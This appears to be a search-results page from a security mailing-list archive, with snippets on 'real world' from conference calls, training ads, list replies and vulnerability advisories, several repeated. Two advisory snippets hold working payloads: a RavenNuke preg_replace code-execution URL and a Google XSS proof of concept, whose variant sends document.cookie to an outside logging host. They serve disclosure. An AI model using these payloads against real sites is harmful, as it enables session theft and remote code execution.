Next Page >>
real/world
More information about the workshop can be found at:
http://iseclab.org/badgers2011/
The BADGERS workshop is intended to encourage the development of large
scale security-related data collection and analysis initiatives. It
will provide an environment to describe already existing real-world,
large-scale datasets, and to share with the systems community the
return on experiences acquired by analyzing such collected
data. Furthermore, novel approaches to collect and study such data
sets are welcome.
>
> No disrespect taken - we're all just people here ;)
>
> Thing is, in a "perfect world" we wouldn't need security at all (well,
> depending on your definition of "perfect world" is of course) - it's
> "real world" issues that require we build multiple layers of defenses to
> ensure that assets are protected when other layers, mechanisms, or
> policies fail. And not being able to predict the future is *precisely*
> why security in depth is required. For example-- Back in January of
> 2003 (where has the time gone?) I published an article on Security Focus
> discussing how to secure Exchange Server deployments.
Building/Hacking Open Source Embedded Wireless Routers
Instructor: Ken Caruso & Matt Westervelt
Availability: 9 seats left
This workshop is setup to teach people how to deploy real-world large
scale wireless networks using open source hardware and software.
People attending this class will receive a free Soekris access point
setup and will get all of the software pre-packaged to readily boot it
up and run any of the standard mesh-networking protocols. This
workshop is run by the guys that run the Seattle Wireless community
easy means of exploiting this VMware emulation flaw.
Unlike the first flaw, this flaw is not affected by VMware's "Disable
acceleration" option, and does not require repetition due to a timing
dependency. More important, however, is that this flaw can be
reproduced easily and accidentally, during real-world usage, by
attempting to single-step an "INT 3" instruction in a debugger. It is
likely that other software developers, and possibly security
researchers, have experienced unintended manifestations of this flaw.
No disrespect taken - we're all just people here ;)
Thing is, in a "perfect world" we wouldn't need security at all (well,
depending on your definition of "perfect world" is of course) - it's
"real world" issues that require we build multiple layers of defenses to
ensure that assets are protected when other layers, mechanisms, or
policies fail. And not being able to predict the future is *precisely*
why security in depth is required. For example-- Back in January of
2003 (where has the time gone?) I published an article on Security Focus
discussing how to secure Exchange Server deployments.
I would like to inform that the next edition's agenda is now available
at: http://2010.confidence.org.pl/agenda.
Among the many distinguished speakers, you can find:
########## SPEAKERS ##########
# Jacob Appelbaum - "Anonymity, Privacy, and Circumvention with Tor in the Real World
# Ulascan Aytlolun, Celil ‘karak0rsan’ Ünüver - "Analysis of Software Vulnerabilities"
# Axelle Apvrille - "The Four Horsemen – Malware for mobile"
# Frank Breedijk - "PKI is dead, long live PKI"
# Jesse Burns - "Aurora attacks" and "Android Reverse Engineering"
# Gynvael Coldwind - "Case study of recent Windows vulnerabilities"
1. attacker must be logged in as user
Comments:
1. Exploit is using "preg_replace" e-modifier
2. "register_globals" setting does not matter
3. Sentinel will not stop this exploit
4. POST method will leave clean logs in most real-world cases
Test using GET method:
http://localhost/ravennuke230/modules.php?name=Your_Account&op=avatarlist
&avatarcategory=gallery&patterns[6]=/a/e&replacements[6]=phpinfo()
Building/Hacking Open Source Embedded Wireless Routers
Instructor: Ken Caruso & Matt Westervelt
Availability: 9 seats left
This workshop is setup to teach people how to deploy real-world large
scale wireless networks using open source hardware and software.
People attending this class will receive a free Soekris access point
setup and will get all of the software pre-packaged to readily boot it
up and run any of the standard mesh-networking protocols. This
workshop is run by the guys that run the Seattle Wireless community
Simple Proof of Concept Code that displays your Google.com cookie in an alert box:-
http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g';alert(document.cookie);//&src=cb&lev=index
More real-world example where an attacker will silently transfer your Google.com cookie to his or her evil site:-
http://google.com/support/webmasters/bin/answer.py?answer=34575&cbid=-1oudgq5c3804g';ifr=document.createElement('iframe');ifr.src='http:'+'//www.securethoughts.com/security/cookielogger/log.cgi?cookie='+escape(document.cookie);document.body.appendChild(ifr);//src=cb&lev=index
I would like thank the Google Security Team for their prompt responses and fixing this serious issue in a timely manner. If you think Google took a long time in fixing this vulnerability, think again. This python script is used in a lot of places. Try this Google Dork to see the usage of this script in almost all Google Services.
Attacking Hardware
* Hardware reverse engineering (and exploitation + backdooring)
* Femto-cell hacking (3G, LTE, ...)
* Microchip grinding, opening, imaging and reverse engineering
* BIOS and otherwise low-level exploitation vectors
* Real-world SMM usage! We know it's vulnerable, now let's do something
* WiFi drivers and System on Chip (SoC) overflow, exploitation and
backdooring.
* Gnu Radio hacking applied to new domains
* Toll-booth and fast-lane payment systems
04: char *psBuf;
05: char *psTmp;
06: char *psTmp2;
07:
08: cbLen = strlen(szUrl);
09: cbLen++; // wrap possible, not exploitable in real world
10: psBuf = malloc(cbLen);
11: if(psBuf == NULL)
12: {
13: return 0;
14: }
VUPEN WASS is based on a proprietary technology developed by VUPEN security
experts, and combines black-box (smart and automated) and grey-box
(signature-based) scanning to accurately identify web vulnerabilities such
as those in the OWASP Top 10 including SQL injection and cross-site
scripting,
but also real-world vulnerabilities such as shell command injection and
file inclusion.
Read More: http://www.vupen.com/english/wass/
Any input from a user is susceptible to tampering. The advisory is specifically about vulnerabilities in how frameworks handle view states. While the frameworks provide functions to secure the view states, the specific vulnerabilities are not documented by the vendors.
Apache's documentation states that the encryption is only needed when t:SaveState tag is used. Sun provides no specific recommendations on encrypting the view state. Microsoft recommends securing the view state, but doesn't provide concise information about what will happen if you don't.
The purpose of our advisory was to show that unsecured view states will always be vulnerable to real-world attacks. This changes view state security from a best-practice to a demonstrable vulnerability for all applications developed on the three frameworks described.
Regarding your specific questions:
1) Yes, we did find specific vulnerabilities in all three products listed. The Microsoft vulnerability is demonstrated in the advisory. The Apache MyFaces vulnerability is described in the advisory, but a specific attack is beyond the scope of the advisory. Trustwave has released Deface (https://www.trustwave.com/spiderLabs-tools.php) to demonstrate an actual attack. The Sun Mojarra vulnerability is essentially the same as the one in Apache MyFaces, but is not supported by Deface. If you are familiar with Java, Deface can be modified for use with Mojarra.
Removing the Uncertainty and Doubt (but not the Fear) from Information
Risk Management
Billy Rios and Jeff Carr, Microsoft
Sun Tzu was a Hacker - A Examination of the Tactics and Operations
from a Real World Cyber Attack
Olivier Thonnard, Royal Military Academy, Belgium
Behavioral Analysis of Zombie Armies
Lt Col Forrest Hare, OSD, George Mason School of Public Policy
VUPEN WASS is based on a proprietary technology developed by VUPEN security
experts, and combines black-box (smart and automated) and grey-box
(signature-based) scanning to accurately identify web vulnerabilities such
as those in the OWASP Top 10 including SQL injection and cross-site
scripting,
but also real-world vulnerabilities such as shell command injection and
file inclusion.
Read More: http://www.vupen.com/english/wass/
Instructors: Gabriel Lawrence, James O'Gorman, Matthew Churchill, & datagram
Includes: USB Flash Drive, Lockpicks, Materials
This course will cover all of the behind the scenes things that you need to know to be an effective security administrator and/or CSO. Thie first day of this course will focus on the different threats and attack vectors of your company covering both network and physical based attacks and ways to identify how attackers could get into your network and the countermeasures that you can take to prevent it from happening.
On the second day, we will address the scenario of if someone does get into your network and go in-depth on how to perform proper incident response, what happens behind the scenes with the whole forensics process, including real-world training from ex-law enforcement, and the do's and don'ts of handling data on compromised machines.
[*] SEMINARS
Pre-Registration: $750
Submissions:
------------
RAID 2009 invites two types of submissions:
1. Full papers presenting mature research results or summarizing
operational experience protecting or monitoring large real-world
networks. Papers can be 10-20 pages long and, if accepted, they will
be presented and included in the RAID 2009 proceedings published by
Springer Verlag in its Lecture Notes in Computer Science
(http://www.springer.de/comp/lncs/index.html) series. Papers must be
formatted according to the instructions provided by Springer Verlag
figures in the international security industry will get together and
share best practices and technology. The conference will be held at the
University of Applied Sciences in Rapperswil lakeside of Lake Zurich on
May 12-15 2011. Significant discoveries about cyber underground,
advanced persistent threat including computer network hack attacks and
defenses, and pragmatic real world security experience will be presented
in a series of well chosen talks. Swiss Cyber Storm provides European
and international researchers a relaxed, comfortable environment to
learn from key developments in security technology, and collaborate and
socialize with their peers in one of Switzerland's most visited towns
with an exceptionally wonderful view to the snowy Alps.
> dead end. ...
...depending on your definition of "dead".
Clearly yours is based on something so far out of touch with the real
world of "typical users" that it really was not worth the effort you
expended writing about it.
Or did you mean "helping organized crime make it's next few millions"?
> ... Not even a very effective drive by.
VUPEN WASS is based on a proprietary technology developed by VUPEN security
experts, and combines black-box (smart and automated) and grey-box
(signature-based) scanning to accurately identify web vulnerabilities such
as those in the OWASP Top 10 including SQL injection and cross-site
scripting,
but also real-world vulnerabilities such as shell command injection and
file inclusion.
Read More: http://www.vupen.com/english/wass/
}
- -----/
To verify this vulnerability with a real-world example, we have
investigated the Sun Java System Webserver WebDAV remote buffer overflow
vulnerability disclosed in January 2010 [7]. The bug was proved
exploitable reliably [8] on DEP enabled systems running as Guest OS on
Virtual PC.
Apocalypse Survivor Normalboy, Laughing Man, Jerome Athias, Roland and
Waldorf Music Gear, and to all the Giraffes In Wheelchairs.
Think you have what it takes to be an eEye Engineer?
eEye Digital Security is always looking for good engineers to add to its
R&D team. If you have a passion for real-world security research and the
drive to create enterprise class solutions, check out our open
positions: http://www.eeye.com/html/company/careers/index.html.
However, if you prefer to break software rather than make it, Research
is always taking resumes at skunkworks@eeye.com.
M. Burnett brings up an important point - there is a lot of
VM-as-panacea promotion going on, and implementers need to put some more
thought into how VMs really fit in to the least privilege model.
Another real-world scenario where this is directly relevant is for
teleworkers.
Some companies provide VMs to remote users thinking that they provide a
secure way for people to connect to a the trusted network from an
untrusted computer. They try to use the VM as virtual security when they
Deploying mission-critical computer systems at locations where they can only be managed remotely is increasingly becoming a necessary requirement of real-world systems design. Thus there is a practical demand for the so-called "self-aware autonomous trusted" systems capable of
- monitoring their own state in order to distinguish "good" states
from inconsistent ones,
- automatically "fixing themselves", i.e., restoring their state to
a known good one when it become "bad" (exploited) or
inconsistent, and
> Although this fix prevented the unlimited overflow of the
> buffer, it still allowed an off-by-one buffer overflow to
> happen, which could potentially still result in remote code
> execution.
Both these bugs of course exist, and have been fixed. However, it is unclear if they could actually be exploited in the real world.
In fact, in order to exploit that function you need:
1) an application which explicitly calls it (i.e. it's not used, as far
as I can tell, in the regular handshake)
2) you should pass the ciphers with the malformed names to BOTH client and server (always as far as I can tell), because cipher setting handshake occurs and it doesn't call the function, so if I'm correct on this, this means:
1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
MIME is a recursive data format. MIME objects consist of a header and a
body, where the content-type field of the header specifies the type of the
body. The body can consist of several separated MIME-objects, a single
MIME-object, a block of text, an encoded image or about anything specified
in the header. It is possible to read some real-world examples by opening
some emails and hitting "show source".
== Two examples to illustrate MIME ==
The first example is the content-type:message/rfc822, which is intended for
forwarding emails. The following body is a complete email, which starts
brlc> 1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
brlc> MIME is a recursive data format. MIME objects consist of a header and a
brlc> body, where the content-type field of the header specifies the type of the
brlc> body. The body can consist of several separated MIME-objects, a single
brlc> MIME-object, a block of text, an encoded image or about anything specified
brlc> in the header. It is possible to read some real-world examples by opening
brlc> some emails and hitting "show source".
brlc> == Two examples to illustrate MIME ==
brlc> The first example is the content-type:message/rfc822, which is intended for
brlc> forwarding emails. The following body is a complete email, which starts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Preconditions:
===============
a) ImageMagick must be set as picture processing method.
Default Coppermine setting is GD, so many of the real-world Coppermine
installations are probably not affected with this security issue.
Impact
===============
An attacker is able to execute arbitrary shell commands with the privileges
• Mikko Hypponen, CRO, F-Secure: Evolution of the Cyber Threat
• Jose Nazario, Arbor Networks: Measuring Global Denial of Service Attacks
• Amit Yoran, CEO, NetWitness: Information Risk Management: Removing the Uncertainty
• Felix Leder and Tillmann Werner: Proactive Botnet Countermeasures: An Offensive Approach
• Andrew Cutts, Director, Cybersecurity Policy (DHS): Cyber Risk from a Homeland Security Perspective
• Billy Rios and Jeff Carr, Microsoft: Examination of a Real World Cyber Attack
• Dr Rex B. Hughes, Cambridge-MIT Institute: Towards a Global Regime for Cyber Defense
• Dr. Stuart H. Starr, NDU: Towards a (Preliminary) Theory of Cyberpower
• Roelof Temmingh, CEO, Paterva: Evaluating the Credibility of a Cyber Threat
• Scott Borg, Director, U.S. Cyber Consequences Unit: The Cyber-Defence Revolution
There are some mitigating factors though:
1. IIS webserver can refuse ".mdb" file download
2. database file or directory can be renamed to something else
Quick look @ real world sites shows, that ~ 20% of them are exploitable.
Considering large number of DBlog-based websites, this is serious problem IMHO.
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next Page>>
|
